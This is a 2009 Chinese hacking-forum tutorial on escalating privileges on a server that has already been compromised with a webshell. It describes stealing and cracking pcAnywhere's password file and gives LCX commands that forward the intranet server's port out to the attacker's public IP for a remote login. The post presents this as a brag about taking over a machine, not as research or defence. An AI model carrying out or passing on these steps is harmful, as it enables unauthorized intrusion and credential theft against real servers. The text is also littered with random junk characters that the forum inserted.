|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
2 ~5 F; L/ t& Z) L% s0 m( y% \1 v$ {$ V0 I* J! F8 M
提权方法:pcanywhere+LCX: U! k# _# Z3 r# ^4 {* c
& @& P- v. J2 |4 @获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。# J0 A) n$ h$ N1 b
, @: O. A1 u. Z% C2 S在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。 ^: J' V3 G4 n" y# t
0 P! q- R. Q+ f+ W$ ~* G
4 p7 o: \- c- ?4 u* y! o- x
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
* s5 _& ~- ~9 n K/ f
* |& L# i& q: H# L6 G# p3 V0 T: ?2 p, E: F; [" B" S- B; w: K
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
& r# r( X$ }: Q! ?! }( Q' ]3 S! t' W) W( a/ Q! {
3 ]1 G5 }6 x4 z$ L& o
5 e. [/ V& F: O) a# |: m& R: l. W) ?1 o- _5 O. w- g
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
F2 S8 h& h( U" i. y3 ]; [
& w7 x1 O) P1 W# O4 z2 Q8 z* ?# k& q2 {- N7 w
LCX的用法再简单说下:
: J7 j1 E( o8 e: _! h" f2 a+ a. c$ Z4 \0 L1 r/ S( s. s
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
$ G7 M9 ~: G+ K4 K1 e
: }, ^6 T; V$ O' J& |+ f本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
J: d* I, }) ?2 U, T; r! m" F' o% P
F) L9 c# q1 U3 ]( K由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
! l! ~4 D2 M. w' _. a/ ~8 d顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``6 }& C1 {+ J6 G. e+ N. t
0 d, w% g3 W# \2 B& R2 v9 ^6 M; G9 R4 \7 A5 R2 H
4 i% _ G; [/ y* R5 T9 o1 j; q
7 }7 m: d8 s# h% C
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
$ S I0 Z6 D3 z; J5 ]7 W/ [1 T+ y* [1 E4 {# l9 w
9 ~8 V7 ]8 S# V0 I
5 T% R' B6 h- ?5 k# p
, E3 v3 [; c. y
我们本地连接试试,输入我们刚破解的账号密码0 c/ o9 t) _2 o5 m t z' k
: h2 F$ c- a/ r1 v7 Q* y
& S. w- T/ Y& a$ t' t3 ^! `呵呵``连接成功,服务器不错,又一个8核^︵^
. ?' {; S/ |# o9 L) g" q% W/ Y' Z- ]/ F! n* d
0 w+ q2 g' |& `3 w. y
. M0 Z' C: t8 H5 i6 k! @
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-12-15 15:36
| 
.gif)
